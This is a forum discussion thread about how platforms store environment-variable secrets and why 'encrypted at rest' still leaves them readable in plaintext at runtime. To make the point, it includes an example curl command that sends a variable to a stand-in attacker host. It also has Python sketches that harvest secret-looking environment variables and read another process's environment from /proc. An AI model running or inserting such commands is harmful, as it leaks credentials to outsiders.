Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.
reply
How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.
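To make that concrete, here's a rough sketch of how trivially a running process — or any dependency it loads — can enumerate its own environment (the variable name and the filter heuristics are made up):

```python
import os

def find_secretish_vars(environ=None):
    """Return every env var whose name looks secret-ish -- in plaintext."""
    markers = ("TOKEN", "KEY", "SECRET", "PASSWORD")
    environ = os.environ if environ is None else environ
    return {k: v for k, v in environ.items()
            if any(m in k.upper() for m in markers)}

# Simulate a secret injected by the hosting platform (name is made up):
os.environ["API_TOKEN"] = "s3cret"

# A malicious dependency would POST this dict to its own server
# instead of printing it.
print(find_secretish_vars())
```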

What's best practice for handling env vars? How do people handle them "securely" without it just being security theater? What tools and workflows are people using?

reply
Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.

However, I do feel now like my sensitive things are better off deployed on a VPS, where someone would need an SSH exploit to come at me.

reply
dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/

Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.

The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.
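The whole pattern roughly boils down to this toy sketch — the XOR keystream stands in for the real authenticated encryption dotenvx/sops use, and the names are made up; don't use it for actual crypto:

```python
import hashlib
import itertools

def keystream(key: bytes):
    # Toy keystream from SHA-256(key || counter); a stand-in for real
    # authenticated encryption -- do NOT use this in production.
    for counter in itertools.count():
        yield from hashlib.sha256(key + counter.to_bytes(8, "big")).digest()

def xor_crypt(data: bytes, key: bytes) -> bytes:
    # XOR is its own inverse, so this both encrypts and decrypts.
    return bytes(b ^ k for b, k in zip(data, keystream(key)))

key = b"lives in .env.keys, outside the repo"        # the decryption key
ciphertext = xor_crypt(b"DB_PASSWORD=hunter2", key)  # the encrypted .env

# "At rest": only `ciphertext` is stored. "At runtime": the runner
# decrypts and hands the plaintext to your app's environment -- which is
# why `dotenvx run -- env` prints everything in the clear.
print(xor_crypt(ciphertext, key).decode())
```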

reply
Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?
reply
Keepass has an option to "encrypt in memory" certain passwords and other sensitive information.

The point of encryption is often about which other software or hardware attacks are minimized or eliminated.

However, if someone figures out access to a running system, there's really no way to both allow an app to run and keep everything encrypted. It certainly is possible to raise the bar, like the way Keepass encrypts items in memory, but if an attacker has root on a server, they can just wait for the secret to be accessed, if not outright find the key that encrypted it.

This is to say, 99.9% of apps and these platforms aren't secure against this type of low-level intrusion.
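A rough sketch of that in-memory trick — not Keepass's actual implementation, just the general idea of keeping the plaintext masked except at the moment of use:

```python
import os

class InMemorySecret:
    """Store a secret XORed with a random pad; recombine only on demand.

    An attacker with root can still dump both halves from memory and XOR
    them together -- this just defeats a naive grep of the heap for
    plaintext."""

    def __init__(self, secret: bytes):
        self._pad = os.urandom(len(secret))
        self._masked = bytes(a ^ b for a, b in zip(secret, self._pad))

    def reveal(self) -> bytes:
        # Plaintext exists only transiently, when actually needed.
        return bytes(a ^ b for a, b in zip(self._masked, self._pad))

print(InMemorySecret(b"hunter2").reveal())
```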

reply
If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.

Various certifications require this, I guess because they were written before hyperscalers, and the assumed attack vector was that someone would literally steal a hard drive.

A running machine is not "at rest": just as you can read files on your encrypted Mac HDD while it's running, the running program has decrypted access to the hard drive.

reply
"Encrypted at rest" is great for guarding against stolen laptops, or, in the server room, against break-ins that steal servers (unlikely at the security level of most hyperscalers, but possible) and, more commonly, broken HDDs being improperly disposed of.
reply
How does that translate to VMs? If "encryption at rest" is done at the guest level, instead of (or in addition to) the host, that would be pretty close to minimal "encrypted except when in use" time and would protect against virtual equivalents of pulling a hard drive out of a data center.
reply
There isn't really a way around it.
reply
Run your own servers so the .env isn't shared with your hosting provider?
reply
There is -- you can expose a UNIX socket for serving credentials and allow access to it only from a whitelist of systemd services.
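A minimal Linux-only sketch of that idea (a hypothetical broker: the server checks the connecting process's UID via `SO_PEERCRED` before handing out the secret; a real setup would enforce the systemd-service whitelist with socket permissions and unit sandboxing on top):

```python
import os
import socket
import struct
import tempfile
import threading

ALLOWED_UIDS = {os.getuid()}  # stand-in for the systemd service whitelist

def serve_once(srv: socket.socket, secret: bytes):
    conn, _ = srv.accept()
    with conn:
        # struct ucred: pid, uid, gid -- three 32-bit ints (Linux only).
        raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                              struct.calcsize("3i"))
        pid, uid, gid = struct.unpack("3i", raw)
        conn.sendall(secret if uid in ALLOWED_UIDS else b"denied")

path = os.path.join(tempfile.mkdtemp(), "creds.sock")
srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
srv.bind(path)
srv.listen(1)
threading.Thread(target=serve_once, args=(srv, b"DB_PASSWORD=hunter2")).start()

with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as client:
    client.connect(path)
    print(client.recv(1024))  # the whitelisted client receives the secret
srv.close()
```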
reply
That works on a single persistent box, but unfortunately, that means giving up on autoscaling, which is not so nice for cloud applications.
reply
You can proxy the UNIX socket to a network server if you want to. You can even use SSL encryption at all times too.
reply
Once it's networked you lose the "whitelist of systemd services" and it's then no different from any networked secret store.
reply
They would still exist in plaintext, just the permissions would make it a little harder to access.
reply
No, UNIX sockets work over SSL too.

You can, theoretically, pick through a system memory dump and try to mine the credentials out of the credential server's heap, but that exploit is exponentially more difficult than a simple `cat /proc/1234/environ`.
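For reference, that /proc read is all it takes on Linux — here's a sketch (the variable name is made up, and the child process just stands in for a running app):

```python
import subprocess
import sys

def read_environ(pid: int) -> dict:
    """Parse /proc/<pid>/environ -- the same NUL-separated data `cat` dumps."""
    with open(f"/proc/{pid}/environ", "rb") as f:
        raw = f.read().decode()
    return dict(e.split("=", 1) for e in raw.split("\0") if "=" in e)

# Spawn a child carrying a (made-up) secret in its environment, then read
# the secret back out of /proc while the child is still running. Root can
# do this to any process on the box; you can do it to your own processes.
child = subprocess.Popen([sys.executable, "-c", "input()"],
                         env={"API_TOKEN": "s3cret"},
                         stdin=subprocess.PIPE, text=True)
try:
    print(read_environ(child.pid)["API_TOKEN"])  # plaintext, no exploit needed
finally:
    child.communicate("\n")
```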

reply
It seems like encrypting and throwing away the key would be the only acceptable strategy.
reply
They need to give your app the environment variables later so they cannot throw away the key.

For non-sensitive environment variables, they also show you the value in the dashboard so you can check and edit them later.

Things like 'NODE_ENV=production' vs 'NODE_ENV=development' are probably something the user wants to see, so that's another argument for letting the backend decrypt and display those values, even ignoring the "running your app" part.

You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

reply
> You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

Piping to /dev/null is of course pointless.

What you really want is the /dev/null as a Service Enterprise plan for $500/month with its High Availability devnull Cluster ;)

https://devnull-as-a-service.com/pricing/

reply
Env vars are not secure. Anything that has root access can see all env vars of all applications via /proc.

(And modern Linux is unusable without root access, thanks to Docker and other fast-and-loose approaches.)

reply
How often do you log in as root, or use sudo to become root, when you're working with Docker containers?

Because I never do, unless I'm down in the depths of /var/lib/docker doing stuff I shouldn't.

reply
That just means you outsourced the `sudo` invocations to some other person. (Which is even worse.)
reply